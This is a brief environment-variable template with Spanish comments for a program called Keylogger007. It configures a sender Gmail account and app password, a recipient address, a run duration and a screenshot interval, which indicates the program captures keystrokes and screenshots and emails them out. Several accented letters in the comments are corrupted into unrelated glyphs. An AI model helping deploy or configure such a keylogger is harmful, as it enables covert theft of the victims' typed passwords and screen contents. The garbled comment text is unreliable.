# Variables de entorno para Keylogger007
EMAIL_ADDRESS=tu_email@gmail.com        # Cuenta remitente
EMAIL_PASSWORD=tu_app_password         # Contrase침a o contrase침a de aplicaci칩n
RECIPIENT_EMAIL=destino@gmail.com       # Cuenta receptora
TIME=60                                # Tiempo de ejecuci칩n en segundos
SCREENSHOT_INTERVAL=10                 # Intervalo de captura de pantalla en segundos